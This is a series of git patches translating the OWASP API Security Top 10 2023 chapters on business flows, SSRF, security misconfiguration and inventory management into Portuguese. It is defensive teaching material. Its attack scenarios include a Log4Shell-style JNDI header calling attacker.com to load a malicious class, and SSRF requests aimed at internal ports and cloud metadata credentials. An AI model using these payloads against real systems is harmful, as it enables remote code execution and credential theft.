criação de comentário/publicação - um atacante pode inundar o sistema + com spam. +* Realização de uma reserva - um atacante pode reservar todos os horários +* disponíveis e impedir que outros utilizadores utilizem o sistema. -O risco de acesso excessivo pode variar entre indústrias e empresas. Por exemplo, a -criação de publicações através de um script pode ser considerada um risco de spam por -uma rede social, mas incentivada por outra rede social. +O risco de acesso excessivo pode variar entre indústrias e empresas. Por +exemplo, a criação de publicações através de um script pode ser considerada um +risco de spam por uma rede social, mas incentivada por outra rede social. -Um endpoint de API está vulnerável se expõe um fluxo de negócio sensível sem restringir -adequadamente o acesso a ele. +Um endpoint de API está vulnerável se expõe um fluxo de negócio sensível sem +restringir adequadamente o acesso a ele. ## Exemplos de Cenários de Ataque ### Cenário #1 -Uma empresa de tecnologia anuncia que vai lançar uma nova consola de jogos no Dia -de Ação de Graças. O produto tem uma procura muito alta e o stock é limitado. Um -atacante escreve código para comprar automaticamente o novo produto e concluir a -transação. +Uma empresa de tecnologia anuncia que vai lançar uma nova consola de jogos no +Dia de Ação de Graças. O produto tem uma procura muito alta e o stock é +limitado. Um atacante escreve código para comprar automaticamente o novo produto +e concluir a transação. No dia do lançamento, o atacante executa o código distribuído por diferentes endereços IP e localizações. A API não implementa a proteção adequada e permite @@ -46,15 +48,16 @@ alto. ### Cenário #2 -Uma companhia aérea oferece a compra de bilhetes online sem taxa de cancelamento. -Um utilizador com intenções maliciosas reserva 90% dos assentos de um voo desejado. +Uma companhia aérea oferece a compra de bilhetes online sem taxa de +cancelamento. Um utilizador com intenções maliciosas reserva 90% dos assentos de +um voo desejado. -Alguns dias antes do voo, o utilizador malicioso cancelou todos os bilhetes de uma -vez, o que obrigou a companhia aérea a baixar os preços dos bilhetes para preencher -o voo. +Alguns dias antes do voo, o utilizador malicioso cancelou todos os bilhetes de +uma vez, o que obrigou a companhia aérea a baixar os preços dos bilhetes para +preencher o voo. -Deste modo, o utilizador consegue comprar um bilhete que está muito mais barato do -que o original. +Deste modo, o utilizador consegue comprar um bilhete que está muito mais barato +do que o original. ### Cenário #3 @@ -85,9 +88,9 @@ O planeamento da mitigação deve ser feito em duas camadas: * _Fingerprinting_ de dispositivos: negar serviço a dispositivos de cliente inesperados (e.g. navegadores _headless_) tende a fazer com que os atacantes usem soluções mais sofisticadas, tornando-as mais caras para eles. - * Detecção humana: utilize _captcha_ ou soluções biométricas mais avançadas + * Deteção humana: utilize _captcha_ ou soluções biométricas mais avançadas (e.g. padrões de digitação). - * Padrões não humanos: analisar o fluxo do utilizador para detectar padrões + * Padrões não humanos: analisar o fluxo do utilizador para detetar padrões não humanos (e.g. o utilizador acedeu às funções "adicionar ao carrinho" e "finalizar compra" em menos de um segundo). * Considere bloquear endereços IP de nós de saída da rede Tor e proxies bem diff --git a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md index 7e36e4a0e..f71d63a25 100644 --- a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md +++ b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md @@ -3,28 +3,28 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Fácil** | Prevalência **Comum** : Detectability **Fácil** | Técnico **Moderado** : Específico do Negócio | -| A exploração requer que o atacante encontre um _endpoint_ da API que aceda a um URI fornecido pelo cliente. Em geral, SSRF básico (quando a resposta é retornada ao atacante) é mais fácil de explorar do que _Blind_ SSRF, em que o atacante não tem feedback sobre se o ataque foi bem sucedido ou não. | Os conceitos modernos no desenvolvimento de aplicações incentivam os desenvolvedores a aceder a URIs fornecidos pelo cliente. A falta de validação ou a validação inadequada desses URIs são problemas comuns. Será necessária a análise regular de solicitações e respostas da API para detectar o problema. Quando a resposta não é retornada (_Blind_ SSRF), a deteção da vulnerabilidade exige mais esforço e criatividade. | A exploração bem sucedida pode levar à enumeração de serviços internos (e.g. scan de portas), divulgação de informações, bypass de firewalls ou outros mecanismos de segurança. Em alguns casos, pode levar a DoS ou ao uso do servidor como um proxy para ocultar atividades maliciosas. | +| A exploração requer que o atacante encontre um _endpoint_ da API que aceda a um URI fornecido pelo cliente. Em geral, SSRF básico (quando a resposta é retornada ao atacante) é mais fácil de explorar do que _Blind_ SSRF, em que o atacante não tem feedback sobre se o ataque foi bem sucedido ou não. | Os conceitos modernos no desenvolvimento de aplicações incentivam os desenvolvedores a aceder a URIs fornecidos pelo cliente. A falta de validação ou a validação inadequada desses URIs são problemas comuns. Será necessária a análise regular de solicitações e respostas da API para detetar o problema. Quando a resposta não é retornada (_Blind_ SSRF), a deteção da vulnerabilidade exige mais esforço e criatividade. | A exploração bem sucedida pode levar à enumeração de serviços internos (e.g. scan de portas), divulgação de informações, bypass de firewalls ou outros mecanismos de segurança. Em alguns casos, pode levar a DoS ou ao uso do servidor como um proxy para ocultar atividades maliciosas. | ## A API é vulnerável? Falhas de Server-Side Request Forgery (SSRF) ocorrem quando uma API pede um -recurso remoto sem validar o URL fornecido pelo utilizador. Isso permite que -um atacante force a aplicação a enviar um pedido manipulado para um destino +recurso remoto sem validar o URL fornecido pelo utilizador. Isso permite que um +atacante force a aplicação a enviar um pedido manipulado para um destino inesperado, mesmo quando protegido por uma firewall ou uma VPN. -Os conceitos modernos no desenvolvimento de aplicações tornam o SSRF mais -comum e mais perigoso. +Os conceitos modernos no desenvolvimento de aplicações tornam o SSRF mais comum +e mais perigoso. -Mais comum - os seguintes conceitos incentivam os desenvolvedores a aceder -a recursos externos com base em entradas de utilizadores: Webhooks, download -de ficheiros a partir de URLs, SSO personalizado e pré-visualização de URLs. +Mais comum - os seguintes conceitos incentivam os desenvolvedores a aceder a +recursos externos com base em entradas de utilizadores: Webhooks, download de +ficheiros a partir de URLs, SSO personalizado e pré-visualização de URLs. Mais perigoso - Tecnologias modernas como provedores de nuvem, Kubernetes e -Docker expõem canais de gestão e controle via HTTP em caminhos previsíveis -e bem conhecidos. Esses canais são um alvo fácil para um ataque SSRF. +Docker expõem canais de gestão e controle via HTTP em caminhos previsíveis e +bem conhecidos. Esses canais são um alvo fácil para um ataque SSRF. -Também é mais desafiador limitar o tráfego de saída da sua aplicação, devido -à natureza conectada das aplicações modernas. +Também é mais desafiador limitar o tráfego de saída da sua aplicação, devido à +natureza conectada das aplicações modernas. O risco de SSRF nem sempre pode ser completamente eliminado. Ao escolher um mecanismo de proteção, é importante considerar os riscos e necessidades do @@ -36,8 +36,8 @@ negócio. Uma rede social permite que os utilizadores façam o upload de fotos de perfil. O utilizador pode escolher entre carregar o ficheiro de imagem do seu -dispositivo ou fornecer o URL da imagem. Escolher a segunda opção irá acionar -a seguinte chamada API: +dispositivo ou fornecer o URL da imagem. Escolher a segunda opção irá acionar a +seguinte chamada API: ``` POST /api/profile/upload_picture From 61a88924c228efe77e8e241adc562e0e5587c369 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sat, 26 Oct 2024 09:42:35 +0100 Subject: [PATCH 45/64] Update 0xa7-server-side-request-forgery.md --- .../pt-pt/0xa7-server-side-request-forgery.md | 57 ++++++++++--------- 1 file changed, 29 insertions(+), 28 deletions(-) diff --git a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md index f71d63a25..c40de1574 100644 --- a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md +++ b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md @@ -47,8 +47,8 @@ POST /api/profile/upload_picture } ``` -An attacker can send a malicious URL and initiate port scanning within the -internal network using the API Endpoint. +Um atacante pode enviar um URL malicioso e iniciar um _scan_ de portas +dentro da rede interna usando o _endpoint_ da API. ``` { @@ -56,18 +56,19 @@ internal network using the API Endpoint. } ``` -Based on the response time, the attacker can figure out whether the port is -open or not. +Com base no tempo de resposta, o atacante pode descobrir se a porta está +aberta ou não. ### Cenário #2 -A security product generates events when it detects anomalies in the network. -Some teams prefer to review the events in a broader, more generic monitoring -system, such as a SIEM (Security Information and Event Management). For this -purpose, the product provides integration with other systems using webhooks. +Um produto de segurança gera eventos quando detecta anomalias na rede. +Algumas equipas preferem rever os eventos num sistema de monitorização mais +amplo e genérico, como um SIEM (Gestão de Informações e Eventos de Segurança). +Para este fim, o produto fornece integração com outros sistemas usando +_webhooks_. -As part of a creation of a new webhook, a GraphQL mutation is sent with the URL -of the SIEM API. +Como parte da criação de um novo _webhook_, uma mutação GraphQL é enviada com o +URL da API do SIEM. ``` POST /graphql @@ -95,11 +96,11 @@ POST /graphql ``` -During the creation process, the API back-end sends a test request to the -provided webhook URL, and presents to the user the response. +Durante o processo de criação, o _back-end_ da API envia um pedido de teste para o +URL do webhook fornecido e apresenta a resposta ao utilizador. -An attacker can leverage this flow, and make the API request a sensitive -resource, such as an internal cloud metadata service that exposes credentials: +Um atacante pode explorar este fluxo e fazer com que a API solicite um recurso +sensível, como um serviço de metadados de nuvem interna que expõe credenciais: ``` POST /graphql @@ -126,23 +127,23 @@ POST /graphql ] ``` -Since the application shows the response from the test request, the attacker -can view the credentials of the cloud environment. +Uma vez que a aplicação mostra a resposta do pedido de teste, o atacante pode +visualizar as credenciais do ambiente de nuvem. ## Como Prevenir -* Isolate the resource fetching mechanism in your network: usually these - features are aimed to retrieve remote resources and not internal ones. -* Whenever possible, use allow lists of: - * Remote origins users are expected to download resources from (e.g. Google - Drive, Gravatar, etc.) - * URL schemes and ports - * Accepted media types for a given functionality -* Disable HTTP redirections. -* Use a well-tested and maintained URL parser to avoid issues caused by URL - parsing inconsistencies. -* Validate and sanitize all client-supplied input data. -* Do not send raw responses to clients. +* Isole o mecanismo de obtenção de recursos na sua rede: geralmente, essas + funcionalidades são destinadas a recuperar recursos remotos e não internos. +* Sempre que possível, utilize listas de permissões de: + * Origens remotas das quais se espera que os utilizadores façam download de + recursos (por exemplo, Google Drive, Gravatar, etc.) + * Esquemas de URL e portas + * Tipos de media aceites para uma determinada funcionalidade +* Desative redirecionamentos HTTP. +* Utilize um URL _parser_ bem testado e mantido para evitar problemas causados +por inconsistências no processamento de URLs. +* Valide e sanitize todos os dados de entrada fornecidos pelo cliente. +* Não envie respostas não tratadas aos clientes. ## Referências From 943f697b679f1bced6e9da9984fa3870128d8583 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 27 Oct 2024 16:12:40 +0000 Subject: [PATCH 46/64] Update 0xa8-security-misconfiguration.md --- .../pt-pt/0xa8-security-misconfiguration.md | 79 ++++++++++--------- 1 file changed, 42 insertions(+), 37 deletions(-) diff --git a/editions/2023/pt-pt/0xa8-security-misconfiguration.md b/editions/2023/pt-pt/0xa8-security-misconfiguration.md index c2dd4b98a..0fc0dece4 100644 --- a/editions/2023/pt-pt/0xa8-security-misconfiguration.md +++ b/editions/2023/pt-pt/0xa8-security-misconfiguration.md @@ -1,50 +1,55 @@ # API8:2023 Security Misconfiguration -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Widespread** : Detectability **Easy** | Technical **Severe** : Business Specific | -| Attackers will often attempt to find unpatched flaws, common endpoints, services running with insecure default configurations, or unprotected files and directories to gain unauthorized access or knowledge of the system. Most of this is public knowledge and exploits may be available. | Security misconfiguration can happen at any level of the API stack, from the network level to the application level. Automated tools are available to detect and exploit misconfigurations such as unnecessary services or legacy options. | Security misconfigurations not only expose sensitive user data, but also system details that can lead to full server compromise. | - -## Is the API Vulnerable? - -The API might be vulnerable if: - -* Appropriate security hardening is missing across any part of the API stack, - or if there are improperly configured permissions on cloud services -* The latest security patches are missing, or the systems are out of date -* Unnecessary features are enabled (e.g. HTTP verbs, logging features) -* There are discrepancies in the way incoming requests are processed by servers - in the HTTP server chain -* Transport Layer Security (TLS) is missing -* Security or cache control directives are not sent to clients -* A Cross-Origin Resource Sharing (CORS) policy is missing or improperly set -* Error messages include stack traces, or expose other sensitive information - -## Example Attack Scenarios - -### Scenario #1 - -An API back-end server maintains an access log written by a popular third-party -open-source logging utility with support for placeholder expansion and JNDI -(Java Naming and Directory Interface) lookups, both enabled by default. For -each request, a new entry is written to the log file with the following -pattern: ` / - `. - -A bad actor issues the following API request, which gets written to the access -log file: +| Específico da API : Abuso **Fácil** | Prevalência **Predominante** : Detectability **Fácil** | Técnico **Severo** : Específico do Negócio | +| Os atacantes frequentemente tentam encontrar falhas não corrigidas, _endpoints_ comuns, serviços a funcionar com configurações padrão inseguras ou arquivos e diretórios não protegidos para obter acesso não autorizado ou conhecimento do sistema. A maior parte disto é conhecimento público e os _exploits_ podem estar disponíveis. | A má configuração de segurança pode ocorrer em qualquer nível da API, desde o nível da rede até o nível da aplicação. Ferramentas automatizadas estão disponíveis para detectar e explorar más configurações, como serviços desnecessários ou opções antigas. | As más configurações de segurança não expõem apenas dados sensíveis dos utilizadores, mas também detalhes do sistema que podem levar a um compromisso total do servidor. | + +## A API é vulnerável? + +A API pode ser vulnerável se: + +* As devidas proteções de segurança não foram aplicadas em qualquer parte da + API, ou se houver permissões mal configuradas em serviços de nuvem. +* Os últimos _patches_ de segurança estão em falta ou os sistemas estão + desatualizados. +* Funcionalidades desnecessárias estão ativadas (por exemplo, verbos HTTP, + funcionalidades de registo de eventos). +* Existem discrepâncias na forma como os pedidos são processados pelos + servidores na cadeia de servidores HTTP. +* A Segurança da Camada de Transporte (TLS) está em falta. +* Diretivas de segurança ou de controlo de cache não são enviadas aos clientes. +* Uma política de Partilha de Recursos entre Origens (CORS) está em falta ou mal + configurada. +* As mensagens de erro incluem _stack traces_ ou expõem outras informações + sensíveis. + +## Exemplos de Cenários de Ataque + +### Cenário #1 + +Um servidor de API _back-end_ mantém um registo de acesso escrito por uma +utilidade de registo _open-source_ popular de terceiros, com suporte para +expansão de espaços reservados e pesquisas JNDI (Java Naming and Directory +Interface), ambos ativados por defeito. Para cada pedido, uma nova entrada é +escrita no ficheiro de registo com o seguinte padrão: +` / - `. + +Um ator malicioso emite o seguinte pedido de API, que é escrito no ficheiro de +registo de acesso: ``` GET /health X-Api-Version: ${jndi:ldap://attacker.com/Malicious.class} ``` -Due to the insecure default configuration of the logging utility and a -permissive network outbound policy, in order to write the corresponding entry -to the access log, while expanding the value in the `X-Api-Version` request -header, the logging utility will pull and execute the `Malicious.class` object -from the attacker's remote controlled server. +Devido à configuração padrão insegura da utilidade de registo e a uma política +de rede de saída permissiva, para escrever a entrada correspondente no registo +de acesso, ao expandir o valor no cabeçalho `X-Api-Version` do pedido, a +utilidade de registo irá buscar e executar o objeto `Malicious.class` do +servidor controlado remotamente pelo atacante. -### Scenario #2 +### Cenário #2 A social network website offers a "Direct Message" feature that allows users to keep private conversations. To retrieve new messages for a specific From 19d51dcd44115f38a6bd32d08987596061dcb1d1 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 31 Oct 2024 13:38:11 +0000 Subject: [PATCH 47/64] Update 0xa8-security-misconfiguration.md --- .../pt-pt/0xa8-security-misconfiguration.md | 91 ++++++++++--------- 1 file changed, 48 insertions(+), 43 deletions(-) diff --git a/editions/2023/pt-pt/0xa8-security-misconfiguration.md b/editions/2023/pt-pt/0xa8-security-misconfiguration.md index 0fc0dece4..122220c6f 100644 --- a/editions/2023/pt-pt/0xa8-security-misconfiguration.md +++ b/editions/2023/pt-pt/0xa8-security-misconfiguration.md @@ -51,53 +51,58 @@ servidor controlado remotamente pelo atacante. ### Cenário #2 -A social network website offers a "Direct Message" feature that allows users to -keep private conversations. To retrieve new messages for a specific -conversation, the website issues the following API request (user interaction is -not required): +Um site de rede social oferece uma funcionalidade de "Mensagem Direta" que +permite aos utilizadores manter conversas privadas. Para recuperar novas +mensagens de uma conversa específica, o site emite o seguinte pedido de API (a +interação do utilizador não é necessária): ``` GET /dm/user_updates.json?conversation_id=1234567&cursor=GRlFp7LCUAAAA ``` -Because the API response does not include the `Cache-Control` HTTP response -header, private conversations end-up cached by the web browser, allowing -malicious actors to retrieve them from the browser cache files in the -filesystem. - -## How To Prevent - -The API life cycle should include: - -* A repeatable hardening process leading to fast and easy deployment of a - properly locked down environment -* A task to review and update configurations across the entire API stack. The - review should include: orchestration files, API components, and cloud - services (e.g. S3 bucket permissions) -* An automated process to continuously assess the effectiveness of the - configuration and settings in all environments - -Furthermore: - -* Ensure that all API communications from the client to the API server and any - downstream/upstream components happen over an encrypted communication channel - (TLS), regardless of whether it is an internal or public-facing API. -* Be specific about which HTTP verbs each API can be accessed by: all other - HTTP verbs should be disabled (e.g. HEAD). -* APIs expecting to be accessed from browser-based clients (e.g., WebApp - front-end) should, at least: - * implement a proper Cross-Origin Resource Sharing (CORS) policy - * include applicable Security Headers -* Restrict incoming content types/data formats to those that meet the business/ - functional requirements. -* Ensure all servers in the HTTP server chain (e.g. load balancers, reverse - and forward proxies, and back-end servers) process incoming requests in a - uniform manner to avoid desync issues. -* Where applicable, define and enforce all API response payload schemas, - including error responses, to prevent exception traces and other valuable - information from being sent back to attackers. - -## References +Como a resposta da API não inclui o cabeçalho de resposta HTTP `Cache-Control`, +as conversas privadas acabam por ser armazenadas em cache pelo navegador, +permitindo que agentes mal-intencionados as recuperem dos ficheiros de cache do +navegador no sistema de ficheiros. + +## Como Prevenir + +O ciclo de vida da API deve incluir: + +* Um processo de proteção reprodutível que possa ser implantado de forma fácil + e rápida com vista a um ambiente de execução devidamente protegido. +* Um processo de revisão e atualização de todas as camadas da API. A revisão + deve incluir: ficheiros de orquestração, componentes da API e serviços na + nuvem (e.g., permissões dos _buckets_ S3). +* Um processo automatizado para verificar de forma continua as configurações e + definições em todos os ambientes (produção, _staging_, testes, + desenvolvimento). + +E ainda: + +* Assegure que todas as comunicações de API, do cliente para o servidor de API e + qualquer componente _downstream_/_upstream_, ocorram através de um canal de + comunicação encriptado (TLS), independentemente de se tratar de uma API + interna ou pública. +* Seja específico sobre quais verbos HTTP cada API pode utilizar: todos os + outros verbos HTTP devem ser desativados (por exemplo, HEAD). +* As APIs que esperam ser acedidas a partir de clientes baseados em navegador + (por exemplo, aplicação web _front-end_) devem, pelo menos: + * implementar uma política adequada de Partilha de Recursos entre Origens + (CORS). + * incluir os Cabeçalhos de Segurança aplicáveis. +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +* Restrinja os tipos de conteúdo/formatos de dados recebidos àqueles que cumprem + os requisitos funcionais/de negócio. +* Assegure que todos os servidores na cadeia de servidores HTTP (por exemplo, + balanceadores de carga, proxies reversos e diretos, e servidores de + _back-end_) processem os pedidos de entrada de forma uniforme para evitar + problemas de dessincronização. +* Quando aplicável, defina e faça cumprir todos os esquemas de dados de resposta + da API, incluindo respostas de erro, para evitar que informações de exceções e + outras informações valiosas sejam enviadas para os atacantes. + +## Referências ### OWASP @@ -107,7 +112,7 @@ Furthermore: * [Testing for Error Handling - Web Security Testing Guide][3] * [Testing for Cross Site Request Forgery - Web Security Testing Guide][4] -### External +### Externas * [CWE-2: Environmental Security Flaws][5] * [CWE-16: Configuration][6] From 5081633c8f8095b12660d2c17671b994fc931eaf Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 31 Oct 2024 13:38:28 +0000 Subject: [PATCH 48/64] Update 0xa8-security-misconfiguration.md --- editions/2023/pt-pt/0xa8-security-misconfiguration.md | 1 - 1 file changed, 1 deletion(-) diff --git a/editions/2023/pt-pt/0xa8-security-misconfiguration.md b/editions/2023/pt-pt/0xa8-security-misconfiguration.md index 122220c6f..0ac606783 100644 --- a/editions/2023/pt-pt/0xa8-security-misconfiguration.md +++ b/editions/2023/pt-pt/0xa8-security-misconfiguration.md @@ -91,7 +91,6 @@ E ainda: * implementar uma política adequada de Partilha de Recursos entre Origens (CORS). * incluir os Cabeçalhos de Segurança aplicáveis. -aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa * Restrinja os tipos de conteúdo/formatos de dados recebidos àqueles que cumprem os requisitos funcionais/de negócio. * Assegure que todos os servidores na cadeia de servidores HTTP (por exemplo, From 43863d4de30322437e752401c6350caf5c83f294 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 31 Oct 2024 16:49:01 +0000 Subject: [PATCH 49/64] Update 0xa9-improper-inventory-management.md --- .../0xa9-improper-inventory-management.md | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/editions/2023/pt-pt/0xa9-improper-inventory-management.md b/editions/2023/pt-pt/0xa9-improper-inventory-management.md index 64458f478..0365107b1 100644 --- a/editions/2023/pt-pt/0xa9-improper-inventory-management.md +++ b/editions/2023/pt-pt/0xa9-improper-inventory-management.md @@ -1,11 +1,11 @@ # API9:2023 Improper Inventory Management -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Widespread** : Detectability **Average** | Technical **Moderate** : Business Specific | -| Threat agents usually get unauthorized access through old API versions or endpoints left running unpatched and using weaker security requirements. In some cases exploits are available. Alternatively, they may get access to sensitive data through a 3rd party with whom there's no reason to share data with. | Outdated documentation makes it more difficult to find and/or fix vulnerabilities. Lack of assets inventory and retirement strategies leads to running unpatched systems, resulting in leakage of sensitive data. It's common to find unnecessarily exposed API hosts because of modern concepts like microservices, which make applications easy to deploy and independent (e.g. cloud computing, K8S). Simple Google Dorking, DNS enumeration, or using specialized search engines for various types of servers (webcams, routers, servers, etc.) connected to the internet will be enough to discover targets. | Attackers can gain access to sensitive data, or even take over the server. Sometimes different API versions/deployments are connected to the same database with real data. Threat agents may exploit deprecated endpoints available in old API versions to get access to administrative functions or exploit known vulnerabilities. | +| Específico da API : Abuso **Fácil** | Prevalência **Predominante** : Deteção **Moderado** | Técnico **Moderado** : Específico Negócio | +| Os agentes ameaça geralmente obtêm acesso não autorizado através de versões antigas de APIs ou _endpoints_ que permanecem em execução sem atualizações e que utilizam requisitos de segurança mais fracos. Em alguns casos, os _exploits_ estão disponíveis online. Alternativamente, podem obter acesso a dados sensíveis através de um terceiro com quem não há razão para compartilhar dados. | Documentação desatualizada torna mais difícil encontrar e/ou corrigir vulnerabilidades. A falta de inventário de recursos e estratégias de desativação leva à execução de sistemas sem atualizações, resultando em vazamentos de dados sensíveis. É comum encontrar hosts de API desnecessariamente expostos devido a conceitos modernos como microserviços, que tornam as aplicações fáceis de implantar e independentes (por exemplo, computação em nuvem, K8S). Um simples Google Dorking, enumeração de DNS ou o uso de motores de busca especializados para vários tipos de servidores (webcams, routers, servidores, etc.) conectados à internet será suficiente para descobrir alvos. | Os atacantes podem obter acesso a dados sensíveis ou até mesmo tomar o controlo do servidor. Às vezes, diferentes versões/implementações da API estão conectadas à mesma base de dados com dados reais. Agentes ameaça podem explorar _endpoints_ obsoletos disponíveis em versões antigas da API para obter acesso a funções administrativas ou explorar vulnerabilidades conhecidas. | -## Is the API Vulnerable? +## A API é vulnerável? The sprawled and connected nature of APIs and modern applications brings new challenges. It is important for organizations not only to have a good @@ -40,9 +40,9 @@ An API has a "data flow blindspot" if: * There is not deep visibility of which type of sensitive data is shared -## Example Attack Scenarios +## Exemplos de Cenários de Ataque -### Scenario #1 +### Cenário #1 A social network implemented a rate-limiting mechanism that blocks attackers from using brute force to guess reset password tokens. This mechanism wasn't @@ -53,7 +53,7 @@ API, including the reset password mechanism, but the rate-limiting mechanism was not in place. The researcher was able to reset the password of any user by using simple brute force to guess the 6 digit token. -### Scenario #2 +### Cenário #2 A social network allows developers of independent apps to integrate with it. As part of this process a consent is requested from the end user, so the social @@ -68,7 +68,7 @@ A consulting firm builds a malicious app and manages to get the consent of to the private information of 50,000,000 users. Later, the consulting firm sells the information for malicious purposes. -## How To Prevent +## Como Prevenir * Inventory all API hosts and document important aspects of each one of them, focusing on the API environment (e.g. production, staging, test, @@ -96,9 +96,9 @@ sells the information for malicious purposes. quickly and force all clients to move to the latest version. -## References +## Referências -### External +### Externas * [CWE-1059: Incomplete Documentation][1] From e3a986fa67b3b185c39fe0e1bade9224be83e116 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 31 Oct 2024 19:45:17 +0000 Subject: [PATCH 50/64] Update 0xa9-improper-inventory-management.md --- .../0xa9-improper-inventory-management.md | 145 ++++++++++-------- 1 file changed, 77 insertions(+), 68 deletions(-) diff --git a/editions/2023/pt-pt/0xa9-improper-inventory-management.md b/editions/2023/pt-pt/0xa9-improper-inventory-management.md index 0365107b1..6a6c1ca12 100644 --- a/editions/2023/pt-pt/0xa9-improper-inventory-management.md +++ b/editions/2023/pt-pt/0xa9-improper-inventory-management.md @@ -7,94 +7,103 @@ ## A API é vulnerável? -The sprawled and connected nature of APIs and modern applications brings new -challenges. It is important for organizations not only to have a good -understanding and visibility of their own APIs and API endpoints, but also how -the APIs are storing or sharing data with external third parties. +A natureza dispersa e conectada das APIs e das aplicações modernas traz novos +desafios. É importante que as organizações não só tenham uma boa compreensão e +visibilidade das suas próprias APIs e _endpoints_, mas também de como as APIs +estão a armazenar ou a partilhar dados com terceiros. -Running multiple versions of an API requires additional management resources -from the API provider and expands the attack surface. +Executar múltiplas versões de uma API requer recursos de gestão adicionais do +fornecedor da API e expande a superfície de ataque. -An API has a "documentation blindspot" if: +Uma API tem um "ponto cego de documentação" se: -* The purpose of an API host is unclear, and there are no explicit answers to - the following questions - * Which environment is the API running in (e.g. production, staging, test, - development)? - * Who should have network access to the API (e.g. public, internal, partners)? - * Which API version is running? -* There is no documentation or the existing documentation is not updated. -* There is no retirement plan for each API version. -* The host's inventory is missing or outdated. +* O propósito de um _host_ da API é pouco claro e não há respostas explícitas + para as seguintes perguntas: + * Em que ambiente está a API a ser executada (por exemplo, produção, + _staging_, teste, desenvolvimento)? + * Quem deve ter acesso à rede da API (por exemplo, público, interno, + parceiros)? + * Qual versão da API está em execução? +* Não existe documentação ou a documentação existente não está atualizada. +* Não existe um plano de desativação para cada versão da API. +* O inventário do _host_ está em falta ou desatualizado. -The visibility and inventory of sensitive data flows play an important role as -part of an incident response plan, in case a breach happens on the third party -side. +A visibilidade e o inventário dos fluxos de dados sensíveis desempenham um papel +importante como parte de um plano de resposta a incidentes, caso ocorra uma +violação do lado de terceiros. -An API has a "data flow blindspot" if: +Uma API tem um "ponto cego de fluxo de dados" se: -* There is a "sensitive data flow" where the API shares sensitive data with a - third party and - * There is not a business justification or approval of the flow - * There is no inventory or visibility of the flow - * There is not deep visibility of which type of sensitive data is shared +* Existe um "fluxo de dados sensíveis" onde a API compartilha dados sensíveis + com um terceiro e + * Não existe uma justificação de negócio ou aprovação do fluxo + * Não existe inventário ou visibilidade do fluxo + * Não há visibilidade detalhada sobre o tipo de dados sensíveis partilhados ## Exemplos de Cenários de Ataque ### Cenário #1 -A social network implemented a rate-limiting mechanism that blocks attackers -from using brute force to guess reset password tokens. This mechanism wasn't -implemented as part of the API code itself but in a separate component between -the client and the official API (`api.socialnetwork.owasp.org`). A researcher -found a beta API host (`beta.api.socialnetwork.owasp.org`) that runs the same -API, including the reset password mechanism, but the rate-limiting mechanism was -not in place. The researcher was able to reset the password of any user by using -simple brute force to guess the 6 digit token. +Uma rede social implementou um mecanismo de limitação de frequência de pedidos +que previne que atacantes possam usar força bruta para adivinhar _tokens_ de +redefinição de _password_. Este mecanismo não foi implementado como parte do +código da própria API, mas num componente separado entre o cliente e a API +oficial (`api.socialnetwork.owasp.org`). Um investigador encontrou um _host_ da +API beta (`beta.api.socialnetwork.owasp.org`) que executa a mesma API, incluindo +o mecanismo de redefinição de _password_, mas sem o mecanismo de limitação de +frequência de pedidos. O investigador conseguiu redefinir a _password_ de +qualquer utilizador usando força bruta simples para adivinhar o _token_ de 6 +dígitos. ### Cenário #2 -A social network allows developers of independent apps to integrate with it. As -part of this process a consent is requested from the end user, so the social -network can share the user's personal information with the independent app. +Uma rede social permite que desenvolvedores de aplicações independentes se +integrem com ela. Como parte desse processo, é solicitado o consentimento do +utilizador final para que a rede social possa partilhar as informações pessoais +do utilizador com a aplicação independente. -The data flow between the social network and the independent apps is not -restrictive or monitored enough, allowing independent apps to access not only -the user information but also the private information of all of their friends. +O fluxo de dados entre a rede social e as aplicações independentes não é +suficientemente restritivo ou monitorizado, permitindo que as aplicações acedam +não apenas às informações do utilizador, mas também às informações privadas de +todos os seus amigos. -A consulting firm builds a malicious app and manages to get the consent of -270,000 users. Because of the flaw, the consulting firm manages to get access -to the private information of 50,000,000 users. Later, the consulting firm -sells the information for malicious purposes. +Uma empresa de consultoria cria uma aplicação maliciosa e consegue obter o +consentimento de 270 mil utilizadores. Devido a essa falha, a empresa de +consultoria consegue aceder às informações privadas de 50 milhões de +utilizadores. Mais tarde, a empresa de consultoria vende as informações para +fins maliciosos. ## Como Prevenir -* Inventory all API hosts and document important aspects of each one - of them, focusing on the API environment (e.g. production, staging, test, - development), who should have network access to the host (e.g. public, - internal, partners) and the API version. -* Inventory integrated services and document important aspects such - as their role in the system, what data is exchanged (data flow), and their - sensitivity. -* Document all aspects of your API such as authentication, errors, redirects, - rate limiting, cross-origin resource sharing (CORS) policy, and endpoints, - including their parameters, requests, and responses. -* Generate documentation automatically by adopting open standards. Include the - documentation build in your CI/CD pipeline. -* Make API documentation available only to those authorized to use the API. -* Use external protection measures such as API security specific solutions for - 